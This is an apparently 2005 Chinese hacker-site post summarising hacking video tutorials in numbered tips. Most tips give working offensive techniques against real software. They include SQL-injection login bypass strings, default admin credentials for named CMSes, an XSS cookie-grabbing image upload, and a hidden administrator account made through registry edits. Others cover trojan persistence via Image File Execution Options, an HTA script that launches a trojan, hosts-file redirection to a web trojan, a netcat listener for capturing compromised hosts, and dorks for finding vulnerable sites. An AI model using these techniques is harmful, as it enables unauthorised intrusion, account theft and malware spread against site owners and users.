黑客动画总结(三)
作者:阿汀qq86494359 来源:www.hack6.com
2005年6月21日到30日黑客动画总结
这几天忙着毕业答辩了,总结写的比较匆忙.
很多服务器都是被serv-u提权了,看看我做的serv-u配置动画,华夏黑客同盟下载
http://www.77169.org/donghua/Class64/200505/19703.html
要你觉得你提权技术不行的话,请先看看我以前做的动画, 总结的很全的
(有语音)击溃服务器bt权限总结+工具
http://www.hack58.com/Software/catalog2/477.html
(有语音)简单突破权限设置漏洞挂马
http://www.hack58.com/Software/catalog6/456.html
下面继续总结这十天的动画
86.搜索inurl:MirCMS_News,在他的根目录下直接去掉后面的然后加上vote/index.asp,
用户名admin'or'1 密码 admin'or'1
87.现在有不少黑客网站用华西黑客联盟的源码,但是没改默认设置,用户名:华西黑盟
密码:hx99.net,数据库/hx_data/hx99.asp,还有密码找回功能也有点小漏洞
88. 大路商城网络系统漏洞,后台可以直接用’or’=’or’登陆,传马。
89.Dvbbs 7.1.0 cookie 存在泄露绝对路径漏洞
上传一张图,代码如下:
GIF89a
<script>alert(document.cookie)</script>
抓包得到cookie如下
Cookie: ASPSESSIONIDSSDSCBQD=NHANOBNCAPCPAMCFMAGDIJCB; datingdvbbs7%2E1%2E0=UserID=617054&usercookies=1&userclass=%D0%C2%CA%D6%C9%CF%C2%B7&username=linzibct&password=t8ob621664s5v6HL&userhidden=2&StatUserID=2189992004; Dvbbs=
分析cookie可以得到站点的绝对路径如下:
d:\\ating\\dvbbs7为论坛的绝对路径
然后再找到此服务器的sql注入漏洞,跨站查询
90.刷全套QQ服务,用ssport扫四川的代理,用花刺验证,然后到http://vnet.qq.com/ok/ 刷
91.Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
cacls C:\windows\system32 /G 阿汀:R
思是给阿汀这个用户只能读取SYSTEM32目录,但不能进行修改或写入
恢复方法:C:\>cacls C:\windows\system32 /G 阿汀:F
92.动网的固顶admin_postings.asp的漏洞,各大网站都有了这个动画,自己去找找,
首先找一个没有固顶帖子的版面,自己要有固顶的权限,固顶时用WSE抓包工具准备抓取提交的post信息,修改getboard后面的内容,具体的看动画吧。
93.用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress
94.避免被跨站方法(1)将目录名的复杂性加大,如web234gjhg888ating (2)每个目录使用不同的IUSR来宾用户 (3)对NTFS的权限设置要好 (4)屏蔽一些不常用的ASP组件
95。内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000
96.密码结巴啊东专版大家不要用了,收不到密码的
97.建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号。
98.在旁注时,网站批量检测里加入/diy.asp和/new.asp等等,经常可以搜索到别人留下的马,可以用他的马,也可以在马里面插入网页木马,让黑站的人反被黑。
99.利用INF文件来修改注册表
[Version]
Signature="$CHICAGO$"
[Defaultinstall]
addREG=Ating
[Ating]
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
HKEY_CURRENT_CONFIG 简写为 HKCC
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
"1"这里代表是写入或删除注册表键值中的具体数据
100.关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
多了一步就是在防火墙里添加个端口,然后导出其键值
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
101.系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
102.将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
103.有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
104.上次总结了用网际快车找网站后台,其实还有影音传送带的站点探测器也可以找后台
105.用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
106.蓝屏木马小漏洞,比如木马地址为http://www.hack6.com/ating.asp,先输入http://www.hack6.com/ating.asp?q=test.asp得到马的绝对路径,然后http://www.hack6.com/ating.asp?q=down.asp&path=马的绝对路径,将里面的密码用jkcr解密,就能与这个别人留下的马了。
107.http://www.ciker.org/attachments/month_0506/2523172663u9_host.rar 这个文件放到C:\WINDOWS下,将里面的网址改为你的网页木马,并删除C:\WINDOWS\system32\drivers\etc下的hosts文件,那么每次上网都会先打开你的网页木马。
108.我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
用法:xsniff –pass –hide –log pass.txt
109.google搜索的艺术
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
或“字符串的语法错误”可以找到很多sql注入漏洞。
110.还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
111.cmd中输入 nc –vv –l –p 1987
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
112.制作T++木马,先写个ating.hta文件,内容为
<script language="VBScript">
set wshshell=createobject ("wscript.shell" )
a=wshshell.run("你马的名称",1)
window.close
</script>
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
113. winhex不仅可以找出QQ大盗里面的盗号人邮箱密码的,还可以找到很多密码,比如盗梦幻西游帐号的木马里面的邮箱密码等等。
114.到google搜索Copyright by All Rights Reserved “phpnuke” site:edu.tw找到好多台湾的站,后台登陆为/admin.php,用phpnuke.html提升,作者没给源码,我截到了源码的截图
内容在http://hack123.home4u.china.com/ating.jpg里
115.拿到了数据库,里面有很多好东西的,比如破解了一个用户的md5,也许这个用户的qq,邮箱等等全是这个密码
116.phpBB version 2.0.15 and prior漏洞
搜索Posted by phpBB version 2.0.15, 先找张管理员发的贴,在地址后面加上&highlig=’.你要执行的语句.’
117.亿酷留言本默认设置漏洞,搜索版本:KUGB v2.0,默认数据库为/kue.asp,插入一句话木马。
118.免费QQ炫铃,打开网址:http://qqring.qq.com先自己注册自己的QQ号码,注意看那个炫铃编号,举例:http://qqring.qq.com/qqring/ring/14860.wav,下载,到QQ的系统参数里修改声音。
119.挂QQ网址和工具大全http://www.cobenet.com/,http://www.qqren.net/,http://qqjqr.com/
http://www.172qq.com/qq.72g.com.rar http://61.143.211.156:81/qqyfk1.3.rar http://218.83.159.136/free512qq.exe http://www.5qq0.com/5qq0free.exe http://qq.poo8.com/download/qq_poo8.rar
最后强烈推荐xiaolu的文章 内网数据库服务器入侵实战
网址:http://www.heibai.net/article/info/info.php?sessid=&infoid=21786